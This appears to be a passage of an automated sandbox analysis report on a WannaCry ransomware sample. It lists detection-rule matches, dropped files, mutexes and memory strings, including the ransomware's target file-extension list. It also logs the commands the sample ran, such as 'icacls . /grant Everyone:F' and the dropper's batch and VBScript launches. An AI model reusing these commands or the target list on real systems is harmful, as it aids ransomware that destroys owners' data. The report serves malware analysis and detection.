Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Process Stats: CPU usage > 24%

Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPF078.tmp
Source: C:\Windows\System32\SIHClient.exe	File created: C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP8333.tmp

Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10006940	0_2_10006940
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10006640	0_2_10006640
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10006280	0_2_10006280
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Code function: 0_2_10005DC0	0_2_10005DC0

Source: WannaCry_2.EXE	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
Source: taskdl.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: WannaCry_2.EXE, 00000000.00000003.1163474692.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000003.1129560844.0000000002713000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000002.2385913238.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekbdlv.dllj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000002.2417113478.000000001000E000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekbdlv.dllj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000003.1129523334.0000000002578000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE
Source: WannaCry_2.EXE, 00000000.00000003.1152098482.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLODCTR.EXEj% vs WannaCry_2.EXE

Source: WannaCry_2.EXE

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: WannaCry_2.EXE, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.WannaCry_2.EXE.9e6968.0.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 0.2.WannaCry_2.EXE.10000000.1.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 202.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.WannaCry_2.EXE.9e6968.0.raw.unpack, type: UNPACKEDPE	Matched rule: WanaCry author = kevoreilly, description = WanaCry Payload, cape_type = WanaCry Payload
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.WannaCry_2.EXE.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 00000000.00000000.1123120496.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000002.2384451558.000000000040F000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\133611722583794.bat, type: DROPPED	Matched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: WannaCry_2.EXE, 00000000.00000003.1163474692.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1411691066.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1140110778.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000003.1152098482.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 000000CA.00000000.1527615654.000000000041F000.00000008.00000001.01000000.00000009.sdmp	Binary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Source: WannaCry_2.EXE, 00000000.00000002.2385913238.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, WannaCry_2.EXE, 00000000.00000002.2417050022.000000001000C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\AppData\Local\Temp\Program Files (x86)\Program Files\WINDOWS\ProgramData\Intel$\CloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: WannaCry_2.EXE, 00000000.00000000.1123120496.000000000040E000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.evad.winEXE@903/948@0/0

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Code function: 0_2_10005540 GetDriveTypeW,InterlockedExchangeAdd,GetDiskFreeSpaceExW,Sleep,GetDiskFreeSpaceExW,Sleep,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,InterlockedExchange,GetDriveTypeW,

0_2_10005540

Source: C:\Users\user\Desktop\WannaCry_2.EXE

File created: C:\Users\user\Desktop\b.wnry

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Mutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Mutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0

Source: C:\Users\user\Desktop\WannaCry_2.EXE

File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\Temp\~SD9E38.tmp

Jump to behavior

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 133611722583794.bat

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs

Source: WannaCry_2.EXE

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\dllhost.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\WannaCry_2.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\SIHClient.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: WannaCry_2.EXE	ReversingLabs: Detection: 92%
Source: WannaCry_2.EXE	Virustotal: Detection: 94%

Source: unknown	Process created: C:\Users\user\Desktop\WannaCry_2.EXE "C:\Users\user\Desktop\WannaCry_2.EXE"
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\attrib.exe attrib +h .
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\Windows\SysWOW64\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 133611722583794.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
Source: C:\Users\user\Desktop\WannaCry_2.EXE	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
